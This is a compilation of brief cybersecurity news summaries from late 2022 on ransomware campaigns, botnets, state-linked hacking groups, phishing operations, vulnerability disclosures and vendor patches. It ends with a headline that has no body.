    Ukrainian cyber-experts have discovered a new attack campaign by suspected Russian threat actors that compromises victims’ VPN accounts to access and encrypt networked resources. The country’s Computer Emergency Response Team (CERT) noted in a new statement that the so-called Somnia ransomware was being used by the FRwL (aka Z-Team), also identified as UAC-0118.

    U.S. Charges Russian Suspects With Operating Z-Library E-book Site

    Z-Library is described as "one of the world's largest public and free-to-access written content repositories, containing 11 million books and 84 million articles in a massive 220 TB database and as a volunteer-run project with no commercial direction. However, at some point, it started offering paid memberships in exchange for premium features.

    Microsoft Urges Devs to Migrate Away From .Net Core 3.1 ASAP

    Microsoft has urged developers still using the long-term support (LTS) release of .NET Core 3.1 to migrate to the latest .NET Core versions until it reaches the end of support (EOS) next month. The company warned customers on the Windows message center to upgrade to .NET 6 (LTS) or .NET 7 "as soon as possible" before .NET Core 3.1 (LTS) reaches EOS on December 13, 2022.

    Study: Electronics Repair Technicians Snoop on Your Data

    When your computer or smartphone needs repairing, can you trust repair technicians not to access or steal your data? According to the results of recent research by scientists at the University of Guelph, Canada, you shouldn’t. Granted, they tested only 16 repair service providers with rigged devices, but in six cases, technicians snooped on customers’ data, and in two, they copied the data to external devices. Oh, and most of them tried to cover their tracks, either by removing evidence (e.g., by clearing items in the “Quick Access” or “Recently Accessed Files” on Microsoft Windows) or by trying not to generate it (e.g., by just zooming in on photo thumbnails).

    New Rapperbot Campaign Targets Game Servers With DDoS Attacks

    Researchers from FortiGuard Labs discovered the previously undetected RapperBot IoT botnet in August, and reported that it is active since mid-June 2022. The bot borrows a large portion of its code from the original Mirai botnet, but unlike other IoT malware families, it implements a built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai.

    North Korean Hackers Target European Orgs With Updated Malware

    North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America. DTrack is a modular backdoor featuring a keylogger, a screenshot snapper, a browser history retriever, a running processes snooper, an IP address and network connection information snatcher, and more. Apart from spying, it can also run commands to perform file operations, fetch additional payloads, steal files and data, and execute processes on the compromised device. The new malware version doesn't feature many functional or code changes compared to samples analyzed in the past, but it is now deployed far more widely.

    Researchers Discover Hundreds of Amazon RDS Instances Leaking Users' Personal Data

    Researchers recently uncovered hundreds of databases on Amazon Relational Database Service (Amazon RDS) which are exposing personally identifiable information (PII). "Amazon RDS is a web service that makes it possible to set up relational databases in the Amazon Web Services (AWS) cloud. It offers support for different database engines such as MariaDB, MySQL, Oracle, PostgreSQL, and SQL Server.

    China-Based Campaign Uses 42,000 Phishing Domains

    Security researchers have uncovered a sophisticated phishing campaign using tens of thousands of malicious domains to spread malware and generate advertising revenue. Dubbed “Fangxiao,” the group directs unsuspecting users to the domains via WhatsApp messages telling them they’ve won a prize, according to security vendor Cyjax. The phishing site landing pages apparently impersonate hundreds of well-known brands including Emirates, Unilever, Coca-Cola, McDonald’s and Knorr. The victims will be redirected to advertising sites, which Fangxiao generates money from, en route to a fake survey where it's claimed they can win a prize.

    Chinese Hackers Target Government Agencies and Defense Orgs

    A cyberespionage threat actor tracked as Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) has been running a campaign targeting a certificate authority, government agencies, and defense organizations in several countries in Asia. The most recent attacks were observed since at least March but the actor has been operating stealthily for more than a decade and it is believed to be a state-sponsored group working for China. Its operations have been documented by multiple cybersecurity companies over the past six years.

    Whoosh Confirms Data Breach After Hackers Sell 7.2M User Records

    Whoosh is Russia's leading urban mobility service platform, operating in 40 cities with over 75,000 scooters. The Russian scooter-sharing service has confirmed a data breach after hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. It was on Friday, when the threat actor began selling the stolen data on a hacking forum, which allegedly contains promotion codes that can be used to access the service for free, as well as partial user identification and payment card data.

    Previously Undetected Earth Longzhi APT Group Is a Subgroup of APT41

    Early this year, Trend Micro investigated a security breach suffered by a company in Taiwan. Threat actors employed a custom Cobalt Strike loader in the attack. Further analysis, revealed that the same threat actor targeted multiple regions using a similar Cobalt Strike loader and has been active since 2020. The experts attributed the attacks to a new subgroup of the China-linked APT41 group, tracked as Earth Longzhi.

    SSVC: Prioritization of Vulnerability Remediation According to CISA

    The volume of newly discovered vulnerabilities continue to increase year after year. As threat actors become better at weaponizing vulnerabilities, it is becoming ever more important for organizations to make timely and well judged decisions in regards to vulnerability prioritization and remediation. While CISA regularly publishes it’s list of most exploited vulnerabilities and regularly updates the Known Exploited Vulnerabilities Catalog, it still remains a challenge for organizations to understand which security holes should be plugged first. To combat these challenges, CISA has been updating and promoting the Stakeholder-Specific Vulnerability Categorization (SSVC) system.

    Microsoft Fixes Windows DirectAccess Connectivity Issues

    Microsoft has resolved a known issue causing connectivity problems for Windows customers using the DirectAccess service to access their organizations remotely without using a virtual private network (VPN). According to Redmond, DirectAccess might not reconnect automatically after the impacted device experience connectivity issues. Scenarios that could lead to this known issue include switching between access points or Wi-Fi networks and temporarily losing network connectivity. The problems affect enterprise endpoints where admins have deployed Windows updates released since mid-October.

    Kmsdbot, a New Evasive Bot for Cryptomining Activity and DDoS Attacks

    The malware was employed in cryptocurrency mining campaigns, KmsdBot supports multiple architectures, including as Winx86, Arm64, and mips64, x86_64, and does not stay persistent to avoid detection. The malicious code was used in attacks targeting multiple sectors including the gaming industry, technology industry, and luxury car manufacturers. The first DDoS attack observed by Akamai targeted a gaming company named FiveM, which allows gamers to host custom private servers for Grand Theft Auto Online. The malware employed specific targeted attacks along with generic Layer 4 and Layer 7 attacks.

    Ukraine Says Russian Hacktivists Use New Somnia Ransomware

    Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called 'Somnia,' encrypting their systems and causing operational problems. The Computer Emergency Response Team of Ukraine (CERT-UA) has confirmed the outbreak via an announcement on its portal, attributing the attacks to 'From Russia with Love' (FRwL), also known as 'Z-Team,' whom they track as UAC-0118. The group previously disclosed creating the Somnia ransomware on Telegram and even posted evidence of attacks against tank producers in Ukraine. However, until today, Ukraine has not confirmed any successful encryption attacks by the hacking group.

    Multiple High-Severity Flaws Affect Widely Used OpenLiteSpeed Web Server Software

    Palo Alto Networks’ Unit 42 research team recently disclosed multiple vulnerabilities in the open-source OpenLiteSpeed Web Server as well as its enterprise version (LiteSpeed Web Server) which could be exploited to achieve remote code execution. In total, three vulnerabilities were uncovered, two of high severity and one of which has been rated medium in severity.
    The vulnerabilities include:

    • Remote Code Execution (CVE-2022-0073) (CVSS 8.8)
    • Privilege Escalation (CVE-2022-0074) (CVSS 8.8)
    • Directory Traversal (CVE-2022-0072) (CVSS 5.8)

    Canadian Food Retail Giant Sobeys Hit by Black Basta Ransomware

    Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend. Sobeys is one of two national grocery retailers in Canada, with 134,000 employees servicing a network of 1,500 stores in all ten provinces under multiple retail banners, including Sobeys, Safeway, IGA, Foodland, FreshCo, Thrifty Foods, and Lawtons Drugs.

    Ukraine Arrests Fraud Ring Members Who Made €200 Million per Year

    Ukraine's cyber police and Europol have identified and arrested five key members of an international investment fraud ring estimated to have caused losses of over €200 million per year. The operation of the investment scheme was spread across multiple European countries, including Ukraine, Germany, Spain, Latvia, Finland, and Albania. The scammers operate call centers and offices in these countries, as required to trick prospective investors into initiating a series of fake investments. The criminals created an extensive network of fake websites posing as cryptocurrency, stocks, bonds, futures, and options investment portals to promote the operation.

    Abused the Windows Credential Roaming in an Attack Against a Diplomatic Entity

    The attack stands out for the use of the Windows Credential Roaming feature. Credential Roaming was introduced by Microsoft in Windows Server 2003 SP1 and is still supported on Windows 11 and Windows Server 2022. The feature is used to roam certificates and other credentials with the user within a domain. APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

    High-Severity Flaw Reported in Critical System Used by Oil and Gas Companies

    Security researchers at Claorty recently disclosed details of a vulnerability in a system used across oil and gas organizations. Tracked as CVE-2022-0902 (CVSS score: 8.1), the flaw is related to a path traversal vulnerability in ABB Totalflow flow computers and remote controllers. “Flow computers are special-purpose electronic instruments used by petrochemical manufacturers to interpret data from flow meters and calculate and record the volume of substances such as natural gas, crude oils, and other hydrocarbon fluids at a specific point in time. These gas measurements are critical not only when it comes to process safety, but are also used as inputs when bulk liquid or gas products change hands between parties, making it imperative that the flow measurements are accurately captured”.

    15,000 sites hacked for massive Google SEO poisoning campaign

    Hackers are conducting a massive black hat search engine optimization (SEO) campaign by compromising almost 15,000 websites to redirect visitors to fake Q&A discussion forums. The attacks were first spotted by Sucuri, who says that each compromised site contains approximately 20,000 files used as part of the search engine spam campaign, with most of the sites being WordPress. The researchers believe the threat actors' goal is to generate enough indexed pages to increase the fake Q&A sites' authority and thus rank better in search engines.

    Google Reveals Spyware Vendor's Use of Samsung Phone Zero-Day Exploits

    Google Project Zero has disclosed the details of three Samsung phone vulnerabilities that have been exploited by a spyware vendor since being designated with zero-day status. The flaws, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, have been chained and exploited against Android phones, but they impact custom Samsung components. The security holes have been described as an arbitrary file read/write issue via a custom clipboard content provider, a kernel information leak, and a use-after-free in the display processing unit driver.

    Malicious extension lets attackers control Google Chrome remotely

    A new Chrome browser botnet named 'Cloud9' has been discovered in the wild using malicious extensions to steal online accounts, log keystrokes, inject ads and malicious JS code, and enlist the victim's browser in DDoS attacks. The Cloud9 browser botnet is effectively a remote access trojan (RAT) for the Chromium web browser, including Google Chrome and Microsoft Edge, allowing the threat actor to remotely execute commands. The malicious Chrome extension isn't available on the official Chrome web store but is instead circulated through alternative channels, such as websites pushing fake Adobe Flash Player updates. This method appears to be working well, as researchers at Zimperium reported today that they have seen Cloud9 infections on systems across the globe.

    Citrix urges admins to patch critical ADC, Gateway auth bypass

    On Tuesday Citrix released security updates to address three flaws impacting Citrix ADC and Citrix Gateway one of which is a critical authentication bypass vulnerability. Successful exploitation of these flaws could enable threat actors to gain unauthorized access to the targeted device, perform remote desktop takeover, and bypass login brute force protections.

    VMware Fixes Three Critical Auth Bypass Bugs in Remote Access Tool

    VMware has released security updates to address three critical severity vulnerabilities in the Workspace ONE Assist solution that enable remote attackers to bypass authentication and elevate privileges to admin. Workspace ONE Assist provides remote control, screen sharing, file system management, and remote command execution to help desk and IT staff remotely access and troubleshoot devices in real time from the Workspace ONE console.

    Microsoft Patch Tuesday Updates Fix 6 Actively Exploited Zero-Days

    11 vulnerabilities are rated as Critical and 53 are rated Important in severity. This month Microsoft addressed a couple of vulnerabilities in MS Exchange that are currently being exploited in the wild. “They were expected last month, but they are finally here (along with several other Exchange fixes). These bugs were purchased by the ZDI at the beginning of September and reported to Microsoft at the time. At some point later, they were detected in the wild. Microsoft has released several different mitigation recommendations, but the best advice is to test and deploy these fixes.” reads the announcement published by ZDI. “There were some who doubted these patches would be released this month, so it’s good to see them here.”

    Advanced RAT AgentTesla Most Prolific Malware in October

    CheckPoint Researchers released their Global Threat Index for October 2022, which features metrics from millions of CheckPoint threat intel sensors, installed across customer networks, endpoints, and mobile devices. The researchers found that AgentTesla accounted for nearly a fifth (16%) of total global detections in October. The report revealed that “AgentTesla was the most widespread malware, impacting 7% of organizations. The advanced RAT malware works as a keylogger and information stealer capable of collecting the victim’s keystrokes, taking screenshots and exfiltrating credentials.

    Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines

    The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. ‘Amadey bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon,’ AhnLab Security Emergency Response Center (ASEC) said in a new report published today.

    New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader

    Cryptocurrency users are being targeted with a new clipper malware strain dubbed Laplas by means of another malware known as SmokeLoader. SmokeLoader, which is delivered by means of weaponized documents sent through spear-phishing emails, further acts as a conduit for other commodity trojans like SystemBC and Raccoon Stealer 2.0, according to an analysis from Cyble. Observed in the wild since circa 2013, SmokeLoader functions as a generic loader capable of distributing additional payloads onto compromised systems, such as information-stealing malware and other implants. In July 2022, it was found to deploy a backdoor called Amadey. Cyble said it discovered over 180 samples of the Laplas since October 24, 2022, suggesting a wide deployment.

    China is Likely Stockpiling and Deploying Vulnerabilities, says Microsoft

    Microsoft has asserted that China's offensive cyber capabilities have improved, thanks to a law that has allowed Beijing to create an arsenal of unreported software vulnerabilities. China's 2021 law required organizations to report security vulnerabilities to local authorities before disclosing them to any other entity. The rules mean Beijing can use local research to hoard vulnerability information.

    Robin Banks Phishing Service for Cybercriminals Returns with Russian Server

    According to a new report from cybersecurity firm IronNet, Robin Banks has returned after relocating its attack infrastructure to DDoS-Guard, a Russian provider of bulletproof hosting services. Robin Banks is a phishing-as-a-service platform that was uncovered back in July 2022. The platform offers ready-made phishing kits that have been used to target customers of well-known banks and online services including Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, etc.

    British Govt Is Scanning All Internet Devices Hosted in UK

    The United Kingdom's National Cyber Security Centre (NCSC), the government agency that leads the country's cyber security mission, is now scanning all Internet-exposed devices hosted in the UK for vulnerabilities. The goal is to assess UK's vulnerability to cyber-attacks and to help the owners of Internet-connected systems understand their security posture.

    New Crimson Kingsnake gang impersonates law firms in BEC attacks

    A business email compromise (BEC) group named 'Crimson Kingsnake' has emerged, impersonating well-known international law firms to trick recipients into approving overdue invoice payments. The threat actors impersonate lawyers who are sending invoices for overdue payment of services supposedly provided to the recipient firm a year ago. This approach creates a solid basis for the BEC attack, as recipients may be intimidated when receiving emails from large law firms like the ones impersonated in the scams.

    Cisco Addressed Several High-severity Flaws in Its Products

    Cisco addressed multiple vulnerabilities impacting some of its products, including high-severity flaws in identity, email, and web security products. The most severe vulnerability addressed by the IT giant is a cross-site request forgery (CSRF) flaw, tracked as CVE-2022-20961 (CVSS score of 8.8), that impacts the Identity Services Engine (ISE). An unauthenticated, remote attacker can exploit the vulnerability to perform arbitrary actions on a vulnerable device. The root cause of the issue is the insufficient CSRF protections for the web-based management interface of an affected device.

    Attackers Leverage Microsoft Dynamics 365 to Phish Users

    Attackers are abusing Microsoft Dynamics 365 Customer Voice to evade email filters and deliver phishing emails into Microsoft users’ inboxes, Avanan researchers are warning. Microsoft Dynamics 365 is a suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications. Customer Voice is one of these applications, and it’s used for collecting data and feedback from customers via surveys, phone calls, etc. The attackers have created Microsoft Dynamics 365 Customer Voice accounts and are using them to send out phishing emails telling recipients that they have received a voicemail. To the end user, this looks like a voicemail from a customer, which would be important to listen to. Clicking on it is the natural step.

    Lockbit Ransomware Claims Attack on Continental Automotive Giant

    LockBit allegedly stole some data from Continental's systems, and they are threatening to publish it on their data leak site if the company doesn't give in to their demands within the next 22 hours. The gang has yet to make any details available regarding what data it exfiltrated from Continental's network or when the breach occurred. Ransomware gangs commonly publish data on their leak sites as a tactic to scare their victims into negotiating a deal or into returning to the negotiation table. Since LockBit says that it will publish "all available" data, this indicates that Continental is yet to negotiate with the ransomware operation or it has already refused to comply with the demands.

    Black Basta Ransomware Gang Linked to the FIN7 Hacking Group

    Security researchers at Sentinel Labs have uncovered evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7, also known as "Carbanak." When analyzing tools used by the ransomware gang in attacks, the researchers found signs that a developer for FIN7 has also authored the EDR (Endpoint Detection and Response) evasion tools used exclusively by Black Basta since June 2022.

    OPERA1ER APT Hackers Targeted Dozens of Financial Organizations in Africa

    A French-speaking threat actor dubbed OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022. According to Singapore-headquartered cybersecurity company Group-IB, the attacks have led to thefts totaling $11 million, with actual damages estimated to be as high as $30 million. Some of the more recent attacks in 2021 and 2021 have singled out five different banks in Burkina Faso, Benin, Ivory Coast, and Senegal. Many of the victims identified are said to have been compromised twice, and their infrastructure subsequently weaponized to strike other organizations.

    Hundreds of U.S. news sites push malware in supply-chain attack

    Threat actors are using the compromised infrastructure of an undisclosed media company to deploy the SocGholish JavaScript malware framework (also known as FakeUpdates) on the websites of hundreds of newspapers across the U.S. ‘The media company in question is a firm that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,’ Sherrod DeGrippo, VP of threat research and detection at Proofpoint, told BleepingComputer. The threat actor behind this supply-chain attack (tracked by Proofpoint as TA569) has injected malicious code into a benign JavaScript file that gets loaded by the news outlets' websites.

    Dozens of PyPI Packages Caught Dropping ‘w4sp’ Info-Stealing Malware

    Researchers have discovered over two dozen Python packages on the PyPI registry that are pushing info-stealing malware. Most of these contain obfuscated code that drops "W4SP" info-stealer on infected machines, while others make use of malware purportedly created for "educational purposes" only. Researchers have identified over two dozen Python packages on the PyPI registry that imitate popular libraries but instead drop info-stealers after infecting machines. The packages, listed below, are typosquats—that is, threat actors publishing these have intentionally named them similar to known Python libraries in hopes that developers attempting to fetch the real library make a spelling error and inadvertently retrieve one of the malicious ones.

    Emotet Botnet Starts Blasting Malware Again After 5 Month Break

    Emotet is a malware infection distributed through phishing campaigns containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL will be downloaded and loaded into memory. Once loaded, the malware will search for and steal emails to use in future spam campaigns and drop additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks. While Emotet was considered the most distributed malware in the past, it suddenly stopped spamming on June 13th, 2022. Researchers from the Emotet research group Cryptolaemus reported that at approximately 4:00 AM ET on November 2nd, the Emotet operation suddenly came alive again, spamming email addresses worldwide.

    CISA Message on OpenSSL 3.0.7 Release

    To follow-up on Monday’s message, OpenSSL has released a security advisory to address the two vulnerabilities (CVE-2022-3602 and CVE-2022-3786), affecting OpenSSL versions 3.0.0 through 3.0.6. Both CVE-2022-3602 and CVE-2022-3786 can cause a denial of service. According to OpenSSL, a cyber threat actor leveraging CVE-2022-3786, "can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution," allowing them to take control of an affected system.

    New Sandstrike Spyware Infects Android Devices via Malicious VPN App

    Threat actors are using newly discovered spyware known as SandStrike and delivered via a malicious VPN application to target Android users. They focus on Persian-speaking practitioners of the Baháʼí Faith, a religion developed in Iran and parts of the Middle East. The attackers are promoting the malicious VPN app as a simple way to circumvent censorship of religious materials in certain regions. To spread it, they use social media accounts to redirect potential victims to a Telegram channel that would provide them with links to download and install the booby-trapped VPN.

    Dropbox Breach: Hackers Unauthorizedly Accessed 130 GitHub Source Code Repositories

    On Tuesday, Dropbox disclosed it was the victim of a phishing campaign that enabled unidentified threat actors to gain unauthorized access to 130 of its source code repositories on GitHub. The repositories allegedly contained copies of modified third-party libraries used by Dropbox, internal prototypes, and some tools and configuration files used by the file hosting service’s security team.

    Ransomware Research: 17 Leaked Databases Operated by Threat- Actors Threaten Third Party Organization

    Ransomware remains a serious threat to organizations, Deep Instinct, a New York-based deep learning cybersecurity specialist, said in its recently released 2022 Interim Cyber Threat Report. It’s no surprise, the company said, as there are currently 17 leaked databases operated by threat actors who are leveraging the data for attacks on third-party companies, most notably social engineering, credential theft, and triple-extortion attacks.

    VMware Warns of the Public Availability of CVE-2021-39144 Exploit Code

    VMware warned of the existence of a public exploit targeting a recently addressed critical remote code execution (RCE) vulnerability, tracked as CVE-2021-39144 (CVSS score of 9.8), in NSX Data Center for vSphere (NSX-V). VMware NSX is a network virtualization solution that is available in VMware vCenter Server. The remote code execution vulnerability resides in the XStream open-source library. Unauthenticated attackers can exploit the vulnerability in low-complexity attacks without user interaction.

    Hackers Selling Access to 576 Corporate Networks for $4 Million

    A new report shows that hackers are selling access to 576 corporate networks worldwide for a total cumulative sales price of $4,000,000, fueling attacks on the enterprise. The research comes from Israeli cyber-intelligence firm KELA which published its Q3 2022 ransomware report, reflecting stable activity in the sector of initial access sales but a steep rise in the value of the offerings. Although the number of sales for network access remained about the same as in the previous two quarters, the cumulative requested price has now reached $4,000,000. For comparison, the total value of initial access listings in Q2 2022 was $660,000, recording a drop in value that coincided with the summer ransomware hiatus that hurt demand. In the third quarter of 2022, KELA's analysts observed 110 threat actors posting 576 initial access offerings totaling a cumulative value of $4,000,000. The average selling price of these listings was $2,800, while the median selling price reached a record figure of $1,350.

    FTC Takes Enforcement Action Against EdTech Giant Chegg

    The Federal Trade Commission (FTC) has taken legal action against EdTech player Chegg, alleging the firm has failed to protect its customers after suffering four data breaches since 2017. The FTC’s proposed order alleged Chegg took “shortcuts” with the personal data of millions of its students and will mandate enhanced data security, limits to data collection, improved access controls and more autonomy for students to delete their own data. The California-based company – which sells online tutoring and online scholarship search services, among other things – collects a large amount of personal and financial information on its customers. This includes their religious affiliation, date of birth, sexual orientation, disabilities, Social Security numbers and medical data, the FTC said.

    Microsoft fixes critical RCE flaw affecting Azure Cosmos DB

    Analysts at Orca Security recently disclosed that they found a critical vulnerability affecting Azure Cosmos DB that could allow an unauthenticated threat actor to read and write access to containers. The flaw which has been dubbed CoMiss, resides in Azure Cosmos DB built-in Jupyter Notebooks that integrate into the Azure portal and Azure Cosmos DB accounts for querying, analyzing, and visualizing NoSQL data and results easier.

    Former British Prime Minister Liz Truss ‘s phone was allegedly hacked by Russian spies

    The personal mobile phone of British Prime Minister Liz Truss was hacked by cyber spies suspected of working for the Kremlin, the Daily Mail reported. According to the British tabloid, the cyber-spies are believed to have gained access to top-secret exchanges with key international partners as well as private conversations with his friend, the British Conservative Party politician Kwasi Kwarteng.

    Github Flaw Could Have Allowed Attackers to Takeover Repositories of Other Users

    The vulnerability was discovered by Checkmarx, which is called the attack technique RepoJacking. The method potentially allowed attackers to infect all applications and code in the repository. The vulnerability could allow an attacker to take control over a GitHub repository and potentially infect all applications and other code relying on it with malicious code. If not explicitly tended, all renamed usernames on GitHub were vulnerable to this flaw, including over 10,000 packages on the Go, Swift, and Packagist package managers.

    CROSS-SECTOR CYBERSECURITY PERFORMANCE GOALS

    In July 2021, President Biden signed a National Security Memorandum on Improving Cybersecurity for Critical Infrastructure Control Systems. This memorandum required CISA, in coordination with the National Institute of Standards and Technology (NIST) and the interagency community, to develop baseline cybersecurity performance goals that are consistent across all critical infrastructure sectors. These voluntary cross-sector Cybersecurity Performance Goals (CPGs) are intended to help establish a common set of fundamental cybersecurity practices for critical infrastructure, and especially help small- and medium-sized organizations kickstart their cybersecurity efforts.

    ConnectWise Recover and R1Soft Server Backup Manager Critical Security Release

    ConnectWise Recover: Recover v2.9.7 and earlier versions are impacted by due to, "Improper Neutralization of Special Elements in Output Used by a Downstream Component." If exploit an attacker could execute remote code or directly access confidential data.

    Affected versions ConnectWise Recover: Recover v2.9.7 and earlier versions are impacted. R1Soft: SBM v6.16.3 and earlier versions are also impacted.

    Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints

    The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware. It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC) said in a detailed write-up. Raspberry Robin, also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives.

    Google Fixes Seventh Chrome Zero-Day Exploited in Attacks This Year

    On Thursday, Google released security updates to address a high-severity zero-day bug that it says is actively being exploited in the wild. Tracked as CVE-2022-3723, the vulnerability is related to a type confusion bug in the Chrome V8 Javascript engine. Type confusion bugs occur when a program allocates a resource, object, or variable using a type and then accesses it using a different, incompatible type, resulting in out-of-bounds memory access. As such, a malicious threat actor could use this access to read sensitive information, cause crashes, and execute arbitrary code.

    API Attacks Have Emerged as the #1 Threat Vector in 2022

    Gartner released new statistics this week on API attacks. According to the researchers, APIs have become the leading attack vector for enterprise web applications. As more organizations move their operations to cloud based services, data is being moved with APIs. ”Organizations are using APIs to build complex applications that serve as the foundation for their business models since they offer an effective way to leverage the data and functionality delivered by an organization’s digital applications and services. They are becoming more popular due to their ability to provide connectivity between disparate systems. For example, an API for a bank can allow you to access your account information from a mobile app or website. In addition, companies may use APIs for internal processes, such as billing or inventory management.

    Android Malware Droppers With 130K Installs Found on Google Play

    A set of Android malware droppers were found infiltrating the Google Play store to install banking trojans pretending to be app updates. Malware droppers are a challenging category of apps to stop because they do not contain malicious code themselves and thus can more easily pass Google Play reviews when submitted to the store. At the same time, they do not raise suspicion among the users as they provide the advertised functionality, and malicious behavior is conducted behind the scenes. Researchers at Threat Fabric, who discovered the new set of droppers, report a rise in the use of droppers for Android malware distribution precisely because they can offer a stealthy pathway to infecting devices. This is particularly important considering the ever-increasing restrictions and safeguards introduced with each major Android release, preventing malware from abusing permissions, fetching malicious modules from external resources, or using the Accessibility service to perform unlimited actions on the device.

    Hackers Use Microsoft IIS Web Server Logs to Control Malware

    The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs. Microsoft Internet Information Services (IIS) is a web server that hosts websites and web applications. It’s also used by other software, such as Outlook on the Web (OWA) for Microsoft Exchange, to host management apps and web interfaces.

    OpenSSL to Fix the Second Critical Flaw Ever

    The OpenSSL Project announced that it is going to release updates to address a critical vulnerability in the open-source toolkit. Experts pointed out that it is the first critical vulnerability patched in toolkit since September 2016.

    The OpenSSL project team would like to announce the forthcoming release of OpenSSL version 3.0.7. This release will be made available on Tuesday 1st November 2022 between 1300-1700 UTC.” reads the announcement. “OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL.

    Notorious ‘Bestbuy’ Hacker Arraigned for Running Dark Web Market

    A notorious British hacker was arraigned on Wednesday by the U.S. Department of Justice for allegedly running the now defunct 'The Real Deal" dark web marketplace. The 34-year-old defendant Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) allegedly ran the illicit services market between early 2015 and November 2016 when The Real Deal shut down. Kaye also allegedly trafficked Twitter and Linked accounts and conspired with a threat actor known as TheDarkOverlord to sell stolen Social Security numbers. He laundered the cryptocurrency obtained while operating The Real Deal using the Bitmixer[.]io Bitcoin mixer service to hide the illicit gains from law enforcement's blockchain tracing analysis efforts.

    Developing Situation: Calix GigaCenter Under Attack - Calix Statement

    Calix development is, and has been, investigating this issue and working on fixes that include remediating systems impacted as well as preventing exploitation of other systems. The problem is understood and a fix is forthcoming. When it is available, customers will be advised via account teams, service bulletins and proactive alerts. This community post will also be updated with information as it becomes available.

    Developing Situation: Calix GigaCenter Under Attack

    We received reports this morning that some Calix GigaCenters were under attack. According to reports, Calix GigaCenter routers that have default or compromised credentials are being attacked. In one case, a service provider reported that 10% of their GigaCenters (844E) rebooted overnight. Another service provider reported that their DNS server’s cache was exhausted impacting DNS resolution.

    VMware Releases Patch for Critical RCE Flaw in Cloud Foundation Platform

    On Tuesday, VMware released security updates to address a critical flaw in the VMware Cloud Foundation Product, a hybrid cloud platform that is used to run enterprise apps in private or public environments. Tracked as CVE-2021-39144, the vulnerability is related to a remote code execution flaw that resides in XStream, an open-source library used by Cloud Foundation.

    RomCom Hackers Circulating Malicious Copy of Popular Software to Target Ukrainian Military

    The threat actor behind a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions as part of a new spear-phishing campaign that commenced on October 21, 2022. The development marks a shift in the attacker's modus operandi, which has been previously attributed to spoofing legitimate apps like Advanced IP Scanner to drop backdoors on compromised systems.

    Two Flaws in Cisco Anyconnect Secure Mobility Client for Windows Actively Exploited

    Cisco is warning of exploitation attempts targeting two security flaws, CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), in the Cisco AnyConnect Secure Mobility Client for Windows. Both vulnerabilities are dated 2020 and are now patched.

    • The CVE-2020-3153 flaw resides in the installer component of AnyConnect Secure Mobility Client for Windows; an authenticated local attacker can exploit the flaw to copy user-supplied files to system-level directories with system-level privileges.
    • The CVE-2020-3433 vulnerability resides in the interprocess communication (IPC) channel of the Cisco AnyConnect Secure Mobility Client for Windows. An authenticated a local attacker can exploit the issue to perform a DLL hijacking attack. To use this vulnerability, the attacker would need to have valid credentials on the Windows system.

    Microsoft: Server Manager Disk Resets Can Lead to Data Loss

    Microsoft warns that a newly acknowledged issue can lead to data loss when resetting virtual disks using the Server Manager management console. Server Manager helps IT admins manage Windows-based servers from their desktops without requiring a Remote Desktop connection or physical access to the servers. Because of this issue, admins attempting to reset (or clear) a virtual disk might accidentally reset the wrong disk, leading to data corruption. They will also see "Failed to reset disk" errors in the Task Progress dialog window, with the 'Found multiple disks with the same ID. Please update your storage driver and then try again.' error message.

    Malicious Clicker Apps in Google Play Have 20M+ Installs

    Security researchers at McAfee have discovered 16 malicious clicker apps available in the official Google Play store that were installed more than 20 million times. One of these apps, DxClean, has more than five million times, and its user rating was 4.1 out of 5 stars. Clicker apps are adware software that loads ads in invisible frames or the background and clicks them to generate revenue for the threat actors behind the campaign. Threat actors have concealed the malicious code in practical utility applications like Flashlight (Torch), QR readers, Camara, Unit converters, and Task managers. Upon executing the clicker apps, they will download the configuration from a remote server and register the FCM listener to receive the push messages.

    Hive Claims Ransomware Attack on Tata Power, Begins Leaking Data

    Hive ransomware group has claimed responsibility for a cyber attack disclosed by Tata Power this month. A subsidiary of the multinational conglomerate Tata Group, Tata Power is India's largest integrated power company based in Mumbai. In screenshots seen by BleepingComputer, Hive operators have posted data they claim to have stolen from Tata Power, indicating that the ransom negotiations failed.

    Exploited Windows Zero-day Lets JavaScript Files Bypass Security Warnings

